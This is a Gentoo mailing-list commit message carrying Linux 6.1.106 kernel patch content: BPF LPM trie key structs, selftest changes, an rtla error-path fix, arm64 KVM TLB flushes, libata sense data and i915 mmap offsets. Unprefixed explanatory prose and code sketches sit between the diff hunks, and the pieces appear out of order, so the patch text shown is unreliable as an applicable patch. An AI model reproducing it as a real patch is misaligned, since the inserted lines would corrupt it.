++/* Deprecated: use struct bpf_lpm_trie_key_u8 (when the "data" member is needed for
++ * byte access) or struct bpf_lpm_trie_key_hdr (when using an alternative type for
++ * the trailing flexible array member) instead.
++ */
+ struct bpf_lpm_trie_key {
+ 	__u32	prefixlen;	/* up to 32 for AF_INET, 128 for AF_INET6 */
+ 	__u8	data[0];	/* Arbitrary size */
+ };
+ 
++/* Header for bpf_lpm_trie_key structs */
++struct bpf_lpm_trie_key_hdr {
++	__u32	prefixlen;
++};
++
++/* Key of a BPF_MAP_TYPE_LPM_TRIE entry, with trailing byte array. */
++struct bpf_lpm_trie_key_u8 {
++	union {
++		struct bpf_lpm_trie_key_hdr	hdr;
++		__u32				prefixlen;
++	};
++	__u8	data[];		/* Arbitrary size */
++};
++
+ struct bpf_cgroup_storage_key {
+ 	__u64	cgroup_inode_id;	/* cgroup inode id */
+ 	__u32	attach_type;		/* program attach type (enum bpf_attach_type) */
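
The uapi change replaces the 0-length array with a proper flexible array
member, split into a reusable header and a byte-addressable variant. A
userspace sketch of how callers size and fill such a key (local struct
copies for illustration, not the uapi header itself):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct lpm_key_hdr { uint32_t prefixlen; };

struct lpm_key_u8 {
	union {
		struct lpm_key_hdr hdr;
		uint32_t prefixlen;
	};
	uint8_t data[];			/* flexible array, as in the uapi */
};

int main(void)
{
	size_t key_size = sizeof(struct lpm_key_u8) + 4;	/* IPv4 */
	struct lpm_key_u8 *key = calloc(1, key_size);

	key->prefixlen = 24;
	memcpy(key->data, (uint8_t[]){192, 168, 1, 0}, 4);
	printf("prefix %d.%d.%d.%d/%u (key_size=%zu)\n",
	       key->data[0], key->data[1], key->data[2], key->data[3],
	       key->hdr.prefixlen, key_size);
	free(key);
	return 0;
}
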
+diff --git a/tools/testing/selftests/bpf/progs/map_ptr_kern.c b/tools/testing/selftests/bpf/progs/map_ptr_kern.c
+index db388f593d0a2..96eed198af361 100644
+--- a/tools/testing/selftests/bpf/progs/map_ptr_kern.c
++++ b/tools/testing/selftests/bpf/progs/map_ptr_kern.c
+@@ -311,7 +311,7 @@ struct lpm_trie {
+ } __attribute__((preserve_access_index));
+ 
+ struct lpm_key {
+-	struct bpf_lpm_trie_key trie_key;
++	struct bpf_lpm_trie_key_hdr trie_key;
+ 	__u32 data;
+ };
+ 
+diff --git a/tools/testing/selftests/bpf/test_lpm_map.c b/tools/testing/selftests/bpf/test_lpm_map.c
+index c028d621c744d..d98c72dc563ea 100644
+--- a/tools/testing/selftests/bpf/test_lpm_map.c
++++ b/tools/testing/selftests/bpf/test_lpm_map.c
+@@ -211,7 +211,7 @@ static void test_lpm_map(int keysize)
+ 	volatile size_t n_matches, n_matches_after_delete;
+ 	size_t i, j, n_nodes, n_lookups;
+ 	struct tlpm_node *t, *list = NULL;
+-	struct bpf_lpm_trie_key *key;
++	struct bpf_lpm_trie_key_u8 *key;
+ 	uint8_t *data, *value;
+ 	int r, map;
+ 
+@@ -331,8 +331,8 @@ static void test_lpm_map(int keysize)
+ static void test_lpm_ipaddr(void)
+ {
+ 	LIBBPF_OPTS(bpf_map_create_opts, opts, .map_flags = BPF_F_NO_PREALLOC);
+-	struct bpf_lpm_trie_key *key_ipv4;
+-	struct bpf_lpm_trie_key *key_ipv6;
++	struct bpf_lpm_trie_key_u8 *key_ipv4;
++	struct bpf_lpm_trie_key_u8 *key_ipv6;
+ 	size_t key_size_ipv4;
+ 	size_t key_size_ipv6;
+ 	int map_fd_ipv4;
+@@ -423,7 +423,7 @@ static void test_lpm_ipaddr(void)
+ static void test_lpm_delete(void)
+ {
+ 	LIBBPF_OPTS(bpf_map_create_opts, opts, .map_flags = BPF_F_NO_PREALLOC);
+-	struct bpf_lpm_trie_key *key;
++	struct bpf_lpm_trie_key_u8 *key;
+ 	size_t key_size;
+ 	int map_fd;
+ 	__u64 value;
+@@ -532,7 +532,7 @@ static void test_lpm_delete(void)
+ static void test_lpm_get_next_key(void)
+ {
+ 	LIBBPF_OPTS(bpf_map_create_opts, opts, .map_flags = BPF_F_NO_PREALLOC);
+-	struct bpf_lpm_trie_key *key_p, *next_key_p;
++	struct bpf_lpm_trie_key_u8 *key_p, *next_key_p;
+ 	size_t key_size;
+ 	__u32 value = 0;
+ 	int map_fd;
+@@ -693,9 +693,9 @@ static void *lpm_test_command(void *arg)
+ {
+ 	int i, j, ret, iter, key_size;
+ 	struct lpm_mt_test_info *info = arg;
+-	struct bpf_lpm_trie_key *key_p;
++	struct bpf_lpm_trie_key_u8 *key_p;
+ 
+-	key_size = sizeof(struct bpf_lpm_trie_key) + sizeof(__u32);
++	key_size = sizeof(*key_p) + sizeof(__u32);
+ 	key_p = alloca(key_size);
+ 	for (iter = 0; iter < info->iter; iter++)
+ 		for (i = 0; i < MAX_TEST_KEYS; i++) {
+@@ -717,7 +717,7 @@ static void *lpm_test_command(void *arg)
+ 				ret = bpf_map_lookup_elem(info->map_fd, key_p, &value);
+ 				assert(ret == 0 || errno == ENOENT);
+ 			} else {
+-				struct bpf_lpm_trie_key *next_key_p = alloca(key_size);
++				struct bpf_lpm_trie_key_u8 *next_key_p = alloca(key_size);
+ 				ret = bpf_map_get_next_key(info->map_fd, key_p, next_key_p);
+ 				assert(ret == 0 || errno == ENOENT || errno == ENOMEM);
+ 			}
+@@ -752,7 +752,7 @@ static void test_lpm_multi_thread(void)
+ 
+ 	/* create a trie */
+ 	value_size = sizeof(__u32);
+-	key_size = sizeof(struct bpf_lpm_trie_key) + value_size;
++	key_size = sizeof(struct bpf_lpm_trie_key_hdr) + value_size;
+ 	map_fd = bpf_map_create(BPF_MAP_TYPE_LPM_TRIE, NULL, key_size, value_size, 100, &opts);
+ 
+ 	/* create 4 threads to test update, delete, lookup and get_next_key */
+diff --git a/tools/testing/selftests/core/close_range_test.c b/tools/testing/selftests/core/close_range_test.c
+index 749239930ca83..190c57b0efeba 100644
+--- a/tools/testing/selftests/core/close_range_test.c
++++ b/tools/testing/selftests/core/close_range_test.c
+@@ -563,4 +563,39 @@ TEST(close_range_cloexec_unshare_syzbot)
+ 	EXPECT_EQ(close(fd3), 0);
+ }
+ 
++TEST(close_range_bitmap_corruption)
++{
++	pid_t pid;
++	int status;
++	struct __clone_args args = {
++		.flags = CLONE_FILES,
++		.exit_signal = SIGCHLD,
++	};
++
++	/* get the first 128 descriptors open */
++	for (int i = 2; i < 128; i++)
++		EXPECT_GE(dup2(0, i), 0);
++
++	/* get descriptor table shared */
++	pid = sys_clone3(&args, sizeof(args));
++	ASSERT_GE(pid, 0);
++
++	if (pid == 0) {
++		/* unshare and truncate descriptor table down to 64 */
++		if (sys_close_range(64, ~0U, CLOSE_RANGE_UNSHARE))
++			exit(EXIT_FAILURE);
++
++		ASSERT_EQ(fcntl(64, F_GETFD), -1);
++		/* ... and verify that the range 64..127 is not
++		   stuck "fully used" according to secondary bitmap */
++		EXPECT_EQ(dup(0), 64)
++			exit(EXIT_FAILURE);
++		exit(EXIT_SUCCESS);
++	}
++
++	EXPECT_EQ(waitpid(pid, &status, 0), pid);
++	EXPECT_EQ(true, WIFEXITED(status));
++	EXPECT_EQ(0, WEXITSTATUS(status));
++}
++
+ TEST_HARNESS_MAIN
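
The new test exercises close_range(2) with CLOSE_RANGE_UNSHARE. For reference, a
hedged sketch of the call itself, assuming a libc that ships the wrapper (glibc
2.34 and later; older systems go through syscall(__NR_close_range, ...)):

	#define _GNU_SOURCE
	#include <linux/close_range.h>	/* CLOSE_RANGE_* flags */
	#include <stdio.h>
	#include <unistd.h>

	/* Unshare the descriptor table from any CLONE_FILES sibling, then
	 * close every descriptor from 64 upward, as the test child does. */
	if (close_range(64, ~0U, CLOSE_RANGE_UNSHARE) < 0)
		perror("close_range");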
+diff --git a/tools/testing/selftests/net/net_helper.sh b/tools/testing/selftests/net/net_helper.sh
+new file mode 100755
+index 0000000000000..6596fe03c77f4
+--- /dev/null
++++ b/tools/testing/selftests/net/net_helper.sh
+@@ -0,0 +1,25 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++#
++# Helper functions
++
++wait_local_port_listen()
++{
++	local listener_ns="${1}"
++	local port="${2}"
++	local protocol="${3}"
++	local pattern
++	local i
++
++	pattern=":$(printf "%04X" "${port}") "
++
++	# for tcp protocol additionally check the socket state
++	[ ${protocol} = "tcp" ] && pattern="${pattern}0A"
++	for i in $(seq 10); do
++		if ip netns exec "${listener_ns}" awk '{print $2" "$4}' \
++		   /proc/net/"${protocol}"* | grep -q "${pattern}"; then
++			break
++		fi
++		sleep 0.1
++	done
++}
+diff --git a/tools/testing/selftests/net/udpgro.sh b/tools/testing/selftests/net/udpgro.sh
+index 0c743752669af..241c6c37994d8 100755
+--- a/tools/testing/selftests/net/udpgro.sh
++++ b/tools/testing/selftests/net/udpgro.sh
+@@ -3,6 +3,8 @@
+ #
+ # Run a series of udpgro functional tests.
+ 
++source net_helper.sh
++
+ readonly PEER_NS="ns-peer-$(mktemp -u XXXXXX)"
+ 
+ BPF_FILE="../bpf/xdp_dummy.bpf.o"
+@@ -44,18 +46,19 @@ run_one() {
+ 	local -r all="$@"
+ 	local -r tx_args=${all%rx*}
+ 	local -r rx_args=${all#*rx}
++	local ret=0
+ 
+ 	cfg_veth
+ 
+-	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${rx_args} && \
+-		echo "ok" || \
+-		echo "failed" &
++	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${rx_args} &
++	local PID1=$!
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen ${PEER_NS} 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+-	ret=$?
+-	wait $(jobs -p)
++	check_err $?
++	wait ${PID1}
++	check_err $?
++	[ "$ret" -eq 0 ] && echo "ok" || echo "failed"
+ 	return $ret
+ }
+ 
+@@ -72,6 +75,7 @@ run_one_nat() {
+ 	local -r all="$@"
+ 	local -r tx_args=${all%rx*}
+ 	local -r rx_args=${all#*rx}
++	local ret=0
+ 
+ 	if [[ ${tx_args} = *-4* ]]; then
+ 		ipt_cmd=iptables
+@@ -92,16 +96,17 @@ run_one_nat() {
+ 	# ... so that GRO will match the UDP_GRO enabled socket, but packets
+ 	# will land on the 'plain' one
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -G ${family} -b ${addr1} -n 0 &
+-	pid=$!
+-	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${family} -b ${addr2%/*} ${rx_args} && \
+-		echo "ok" || \
+-		echo "failed"&
++	local PID1=$!
++	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${family} -b ${addr2%/*} ${rx_args} &
++	local PID2=$!
+ 
+-	sleep 0.1
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+-	ret=$?
+-	kill -INT $pid
+-	wait $(jobs -p)
++	check_err $?
++	kill -INT ${PID1}
++	wait ${PID2}
++	check_err $?
++	[ "$ret" -eq 0 ] && echo "ok" || echo "failed"
+ 	return $ret
+ }
+ 
+@@ -110,22 +115,26 @@ run_one_2sock() {
+ 	local -r all="$@"
+ 	local -r tx_args=${all%rx*}
+ 	local -r rx_args=${all#*rx}
++	local ret=0
+ 
+ 	cfg_veth
+ 
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${rx_args} -p 12345 &
+-	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 2000 -R 10 ${rx_args} && \
+-		echo "ok" || \
+-		echo "failed" &
++	local PID1=$!
++	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 2000 -R 10 ${rx_args} &
++	local PID2=$!
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen "${PEER_NS}" 12345 udp
+ 	./udpgso_bench_tx ${tx_args} -p 12345
+-	sleep 0.1
+-	# first UDP GSO socket should be closed at this point
++	check_err $?
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+-	ret=$?
+-	wait $(jobs -p)
++	check_err $?
++	wait ${PID1}
++	check_err $?
++	wait ${PID2}
++	check_err $?
++	[ "$ret" -eq 0 ] && echo "ok" || echo "failed"
+ 	return $ret
+ }
+ 
+diff --git a/tools/testing/selftests/net/udpgro_bench.sh b/tools/testing/selftests/net/udpgro_bench.sh
+index 894972877e8b0..cb664679b4342 100755
+--- a/tools/testing/selftests/net/udpgro_bench.sh
++++ b/tools/testing/selftests/net/udpgro_bench.sh
+@@ -3,6 +3,8 @@
+ #
+ # Run a series of udpgro benchmarks
+ 
++source net_helper.sh
++
+ readonly PEER_NS="ns-peer-$(mktemp -u XXXXXX)"
+ 
+ BPF_FILE="../bpf/xdp_dummy.bpf.o"
+@@ -40,8 +42,7 @@ run_one() {
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx ${rx_args} -r &
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -t ${rx_args} -r &
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+ }
+ 
+diff --git a/tools/testing/selftests/net/udpgro_frglist.sh b/tools/testing/selftests/net/udpgro_frglist.sh
+index 0a6359bed0b92..dd47fa96f6b3e 100755
+--- a/tools/testing/selftests/net/udpgro_frglist.sh
++++ b/tools/testing/selftests/net/udpgro_frglist.sh
+@@ -3,6 +3,8 @@
+ #
+ # Run a series of udpgro benchmarks
+ 
++source net_helper.sh
++
+ readonly PEER_NS="ns-peer-$(mktemp -u XXXXXX)"
+ 
+ BPF_FILE="../bpf/xdp_dummy.bpf.o"
+@@ -45,8 +47,7 @@ run_one() {
+         echo ${rx_args}
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx ${rx_args} -r &
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+ }
+ 
+diff --git a/tools/testing/selftests/net/udpgso.c b/tools/testing/selftests/net/udpgso.c
+index 7badaf215de28..b02080d09fbc0 100644
+--- a/tools/testing/selftests/net/udpgso.c
++++ b/tools/testing/selftests/net/udpgso.c
+@@ -34,7 +34,7 @@
+ #endif
+ 
+ #ifndef UDP_MAX_SEGMENTS
+-#define UDP_MAX_SEGMENTS	(1 << 6UL)
++#define UDP_MAX_SEGMENTS	(1 << 7UL)
+ #endif
+ 
+ #define CONST_MTU_TEST	1500
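
The bumped fallback matches the kernel's current UDP_MAX_SEGMENTS of 1 << 7, i.e.
at most 128 segments per UDP GSO send. A hedged sketch of the socket option this
constant bounds (UDP_SEGMENT comes from the UDP headers on recent toolchains;
older ones define it by hand exactly as the #ifndef above does, and fd stands in
for an already-set-up UDP socket):

	#include <netinet/udp.h>	/* SOL_UDP, UDP_SEGMENT on recent libcs */
	#include <sys/socket.h>

	/* Ask the kernel to slice each large send into 1400-byte datagrams;
	 * one send call may then carry up to UDP_MAX_SEGMENTS segments. */
	int gso_size = 1400;
	setsockopt(fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size));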
+diff --git a/tools/testing/selftests/tc-testing/tdc.py b/tools/testing/selftests/tc-testing/tdc.py
+index ee22e3447ec7e..4702c99c99d3f 100755
+--- a/tools/testing/selftests/tc-testing/tdc.py
++++ b/tools/testing/selftests/tc-testing/tdc.py
+@@ -129,7 +129,6 @@ class PluginMgr:
+             except Exception as ee:
+                 print('exception {} in call to pre_case for {} plugin'.
+                       format(ee, pgn_inst.__class__))
+-                print('test_ordinal is {}'.format(test_ordinal))
+                 print('testid is {}'.format(caseinfo['id']))
+                 raise
+ 
+diff --git a/tools/tracing/rtla/src/osnoise_top.c b/tools/tracing/rtla/src/osnoise_top.c
+index 6c07f360de72c..2e3c70723fdc7 100644
+--- a/tools/tracing/rtla/src/osnoise_top.c
++++ b/tools/tracing/rtla/src/osnoise_top.c
+@@ -520,8 +520,10 @@ struct osnoise_tool *osnoise_init_top(struct osnoise_top_params *params)
+ 		return NULL;
+ 
+ 	tool->data = osnoise_alloc_top(nr_cpus);
+-	if (!tool->data)
+-		goto out_err;
++	if (!tool->data) {
++		osnoise_destroy_tool(tool);
++		return NULL;
++	}
+ 
+ 	tool->params = params;
+ 
+@@ -529,11 +531,6 @@ struct osnoise_tool *osnoise_init_top(struct osnoise_top_params *params)
+ 				   osnoise_top_handler, NULL);
+ 
+ 	return tool;
+-
+-out_err:
+-	osnoise_free_top(tool->data);
+-	osnoise_destroy_tool(tool);
+-	return NULL;
+ }
+ 
+ static int stop_tracing;
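
For context: the removed out_err label was reached only when tool->data had just
failed to allocate, yet it still called osnoise_free_top(tool->data) with a NULL
pointer. Assuming, as the fix implies, that osnoise_free_top() dereferences its
argument, the rewritten path sidesteps that by unwinding exactly what exists:

	tool->data = osnoise_alloc_top(nr_cpus);
	if (!tool->data) {
		osnoise_destroy_tool(tool);	/* tool itself was allocated */
		return NULL;			/* nothing else to unwind */
	}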


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-19 10:43 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-19 10:43 UTC (permalink / raw
  To: gentoo-commits

commit:     62f59f27365115a6367aa87ed41ac365298980f6
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Aug 19 10:42:53 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Aug 19 10:42:53 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=62f59f27

Linux patch 6.1.106

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    8 +
 1105_linux-6.1.106.patch | 2097 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2105 insertions(+)

diff --git a/0000_README b/0000_README
index a89ea6e6..5002259e 100644
--- a/0000_README
+++ b/0000_README
@@ -463,6 +463,14 @@ Patch:  1104_linux-6.1.105.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.105
 
+Patch:  1104_linux-6.1.105.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.105
+
+Patch:  1105_linux-6.1.106.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.106
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1105_linux-6.1.106.patch b/1105_linux-6.1.106.patch
new file mode 100644
index 00000000..b7a2cc75
--- /dev/null
+++ b/1105_linux-6.1.106.patch
@@ -0,0 +1,2097 @@
+diff --git a/Makefile b/Makefile
+index 08ca316cb46dcf..f0fd656e9da3c0 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 105
++SUBLEVEL = 106
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/kvm/hyp/pgtable.c b/arch/arm64/kvm/hyp/pgtable.c
+index ae5f6b5ac80fd3..f0167dc7438f8a 100644
+--- a/arch/arm64/kvm/hyp/pgtable.c
++++ b/arch/arm64/kvm/hyp/pgtable.c
+@@ -475,7 +475,7 @@ static int hyp_unmap_walker(u64 addr, u64 end, u32 level, kvm_pte_t *ptep,
+ 
+ 		kvm_clear_pte(ptep);
+ 		dsb(ishst);
+-		__tlbi_level(vae2is, __TLBI_VADDR(addr, 0), level);
++		__tlbi_level(vae2is, __TLBI_VADDR(addr, 0), 0);
+ 	} else {
+ 		if (end - addr < granule)
+ 			return -EINVAL;
+@@ -699,8 +699,14 @@ static void stage2_put_pte(kvm_pte_t *ptep, struct kvm_s2_mmu *mmu, u64 addr,
+ 	 * Clear the existing PTE, and perform break-before-make with
+ 	 * TLB maintenance if it was valid.
+ 	 */
+-	if (kvm_pte_valid(*ptep)) {
++	kvm_pte_t pte = *ptep;
++
++	if (kvm_pte_valid(pte)) {
+ 		kvm_clear_pte(ptep);
++
++		if (kvm_pte_table(pte, level))
++			level = 0;
++
+ 		kvm_call_hyp(__kvm_tlb_flush_vmid_ipa, mmu, addr, level);
+ 	}
+ 
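
The rule both hyp hunks encode, restated: a TLBI level hint promises the CPU that
only leaf entries at that translation level are being invalidated, so it must be
dropped (level 0 means "no hint") when zapping a table entry whose children live
at deeper levels. Condensed from the stage-2 hunk above:

	kvm_pte_t pte = *ptep;

	if (kvm_pte_valid(pte)) {
		kvm_clear_pte(ptep);
		if (kvm_pte_table(pte, level))
			level = 0;	/* table entry: flush every level */
		kvm_call_hyp(__kvm_tlb_flush_vmid_ipa, mmu, addr, level);
	}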
+diff --git a/arch/loongarch/include/uapi/asm/unistd.h b/arch/loongarch/include/uapi/asm/unistd.h
+index fcb668984f0336..b344b1f917153b 100644
+--- a/arch/loongarch/include/uapi/asm/unistd.h
++++ b/arch/loongarch/include/uapi/asm/unistd.h
+@@ -1,4 +1,5 @@
+ /* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
++#define __ARCH_WANT_NEW_STAT
+ #define __ARCH_WANT_SYS_CLONE
+ #define __ARCH_WANT_SYS_CLONE3
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index c8970453b4d9f5..0e71b8763c4cb6 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -900,8 +900,19 @@ static void ata_gen_passthru_sense(struct ata_queued_cmd *qc)
+ 				   &sense_key, &asc, &ascq, verbose);
+ 		ata_scsi_set_sense(qc->dev, cmd, sense_key, asc, ascq);
+ 	} else {
+-		/* ATA PASS-THROUGH INFORMATION AVAILABLE */
+-		ata_scsi_set_sense(qc->dev, cmd, RECOVERED_ERROR, 0, 0x1D);
++		/*
++		 * ATA PASS-THROUGH INFORMATION AVAILABLE
++		 *
++		 * Note: we are supposed to call ata_scsi_set_sense(), which
++		 * respects the D_SENSE bit, instead of unconditionally
++		 * generating the sense data in descriptor format. However,
++		 * because hdparm, hddtemp, and udisks incorrectly assume sense
++		 * data in descriptor format, without even looking at the
++		 * RESPONSE CODE field in the returned sense data (to see which
++		 * format the returned sense data is in), we are stuck with
++		 * being bug compatible with older kernels.
++		 */
++		scsi_build_sense(cmd, 1, RECOVERED_ERROR, 0, 0x1D);
+ 	}
+ 
+ 	if ((cmd->sense_buffer[0] & 0x7f) >= 0x72) {
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index d7e30d889a5ca5..7e9310d01dfdd2 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -290,6 +290,41 @@ static vm_fault_t vm_fault_cpu(struct vm_fault *vmf)
+ 	return i915_error_to_vmf_fault(err);
+ }
+ 
++static void set_address_limits(struct vm_area_struct *area,
++			       struct i915_vma *vma,
++			       unsigned long obj_offset,
++			       unsigned long *start_vaddr,
++			       unsigned long *end_vaddr)
++{
++	unsigned long vm_start, vm_end, vma_size; /* user's memory parameters */
++	long start, end; /* memory boundaries */
++
++	/*
++	 * Let's move into the ">> PAGE_SHIFT"
++	 * domain to be sure not to lose bits
++	 */
++	vm_start = area->vm_start >> PAGE_SHIFT;
++	vm_end = area->vm_end >> PAGE_SHIFT;
++	vma_size = vma->size >> PAGE_SHIFT;
++
++	/*
++	 * Calculate the memory boundaries by considering the offset
++	 * provided by the user during memory mapping and the offset
++	 * provided for the partial mapping.
++	 */
++	start = vm_start;
++	start -= obj_offset;
++	start += vma->gtt_view.partial.offset;
++	end = start + vma_size;
++
++	start = max_t(long, start, vm_start);
++	end = min_t(long, end, vm_end);
++
++	/* Let's move back into the "<< PAGE_SHIFT" domain */
++	*start_vaddr = (unsigned long)start << PAGE_SHIFT;
++	*end_vaddr = (unsigned long)end << PAGE_SHIFT;
++}
++
+ static vm_fault_t vm_fault_gtt(struct vm_fault *vmf)
+ {
+ #define MIN_CHUNK_PAGES (SZ_1M >> PAGE_SHIFT)
+@@ -302,14 +337,18 @@ static vm_fault_t vm_fault_gtt(struct vm_fault *vmf)
+ 	struct i915_ggtt *ggtt = to_gt(i915)->ggtt;
+ 	bool write = area->vm_flags & VM_WRITE;
+ 	struct i915_gem_ww_ctx ww;
++	unsigned long obj_offset;
++	unsigned long start, end; /* memory boundaries */
+ 	intel_wakeref_t wakeref;
+ 	struct i915_vma *vma;
+ 	pgoff_t page_offset;
++	unsigned long pfn;
+ 	int srcu;
+ 	int ret;
+ 
+-	/* We don't use vmf->pgoff since that has the fake offset */
++	obj_offset = area->vm_pgoff - drm_vma_node_start(&mmo->vma_node);
+ 	page_offset = (vmf->address - area->vm_start) >> PAGE_SHIFT;
++	page_offset += obj_offset;
+ 
+ 	trace_i915_gem_object_fault(obj, page_offset, true, write);
+ 
+@@ -393,12 +432,14 @@ static vm_fault_t vm_fault_gtt(struct vm_fault *vmf)
+ 	if (ret)
+ 		goto err_unpin;
+ 
++	set_address_limits(area, vma, obj_offset, &start, &end);
++
++	pfn = (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT;
++	pfn += (start - area->vm_start) >> PAGE_SHIFT;
++	pfn += obj_offset - vma->gtt_view.partial.offset;
++
+ 	/* Finally, remap it using the new GTT offset */
+-	ret = remap_io_mapping(area,
+-			       area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),
+-			       (ggtt->gmadr.start + vma->node.start) >> PAGE_SHIFT,
+-			       min_t(u64, vma->size, area->vm_end - area->vm_start),
+-			       &ggtt->iomap);
++	ret = remap_io_mapping(area, start, pfn, end - start, &ggtt->iomap);
+ 	if (ret)
+ 		goto err_fence;
+ 
+@@ -928,53 +969,15 @@ static struct file *mmap_singleton(struct drm_i915_private *i915)
+ 	return file;
+ }
+ 
+-/*
+- * This overcomes the limitation in drm_gem_mmap's assignment of a
+- * drm_gem_object as the vma->vm_private_data. Since we need to
+- * be able to resolve multiple mmap offsets which could be tied
+- * to a single gem object.
+- */
+-int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
++static int
++i915_gem_object_mmap(struct drm_i915_gem_object *obj,
++		     struct i915_mmap_offset *mmo,
++		     struct vm_area_struct *vma)
+ {
+-	struct drm_vma_offset_node *node;
+-	struct drm_file *priv = filp->private_data;
+-	struct drm_device *dev = priv->minor->dev;
+-	struct drm_i915_gem_object *obj = NULL;
+-	struct i915_mmap_offset *mmo = NULL;
++	struct drm_i915_private *i915 = to_i915(obj->base.dev);
++	struct drm_device *dev = &i915->drm;
+ 	struct file *anon;
+ 
+-	if (drm_dev_is_unplugged(dev))
+-		return -ENODEV;
+-
+-	rcu_read_lock();
+-	drm_vma_offset_lock_lookup(dev->vma_offset_manager);
+-	node = drm_vma_offset_exact_lookup_locked(dev->vma_offset_manager,
+-						  vma->vm_pgoff,
+-						  vma_pages(vma));
+-	if (node && drm_vma_node_is_allowed(node, priv)) {
+-		/*
+-		 * Skip 0-refcnted objects as it is in the process of being
+-		 * destroyed and will be invalid when the vma manager lock
+-		 * is released.
+-		 */
+-		if (!node->driver_private) {
+-			mmo = container_of(node, struct i915_mmap_offset, vma_node);
+-			obj = i915_gem_object_get_rcu(mmo->obj);
+-
+-			GEM_BUG_ON(obj && obj->ops->mmap_ops);
+-		} else {
+-			obj = i915_gem_object_get_rcu
+-				(container_of(node, struct drm_i915_gem_object,
+-					      base.vma_node));
+-
+-			GEM_BUG_ON(obj && !obj->ops->mmap_ops);
+-		}
+-	}
+-	drm_vma_offset_unlock_lookup(dev->vma_offset_manager);
+-	rcu_read_unlock();
+-	if (!obj)
+-		return node ? -EACCES : -EINVAL;
+-
+ 	if (i915_gem_object_is_readonly(obj)) {
+ 		if (vma->vm_flags & VM_WRITE) {
+ 			i915_gem_object_put(obj);
+@@ -1006,7 +1009,7 @@ int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
+ 	if (obj->ops->mmap_ops) {
+ 		vma->vm_page_prot = pgprot_decrypted(vm_get_page_prot(vma->vm_flags));
+ 		vma->vm_ops = obj->ops->mmap_ops;
+-		vma->vm_private_data = node->driver_private;
++		vma->vm_private_data = obj->base.vma_node.driver_private;
+ 		return 0;
+ 	}
+ 
+@@ -1044,6 +1047,93 @@ int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
+ 	return 0;
+ }
+ 
++/*
++ * This overcomes the limitation in drm_gem_mmap's assignment of a
++ * drm_gem_object as the vma->vm_private_data. Since we need to
++ * be able to resolve multiple mmap offsets which could be tied
++ * to a single gem object.
++ */
++int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
++{
++	struct drm_vma_offset_node *node;
++	struct drm_file *priv = filp->private_data;
++	struct drm_device *dev = priv->minor->dev;
++	struct drm_i915_gem_object *obj = NULL;
++	struct i915_mmap_offset *mmo = NULL;
++
++	if (drm_dev_is_unplugged(dev))
++		return -ENODEV;
++
++	rcu_read_lock();
++	drm_vma_offset_lock_lookup(dev->vma_offset_manager);
++	node = drm_vma_offset_exact_lookup_locked(dev->vma_offset_manager,
++						  vma->vm_pgoff,
++						  vma_pages(vma));
++	if (node && drm_vma_node_is_allowed(node, priv)) {
++		/*
++		 * Skip 0-refcnted objects as it is in the process of being
++		 * destroyed and will be invalid when the vma manager lock
++		 * is released.
++		 */
++		if (!node->driver_private) {
++			mmo = container_of(node, struct i915_mmap_offset, vma_node);
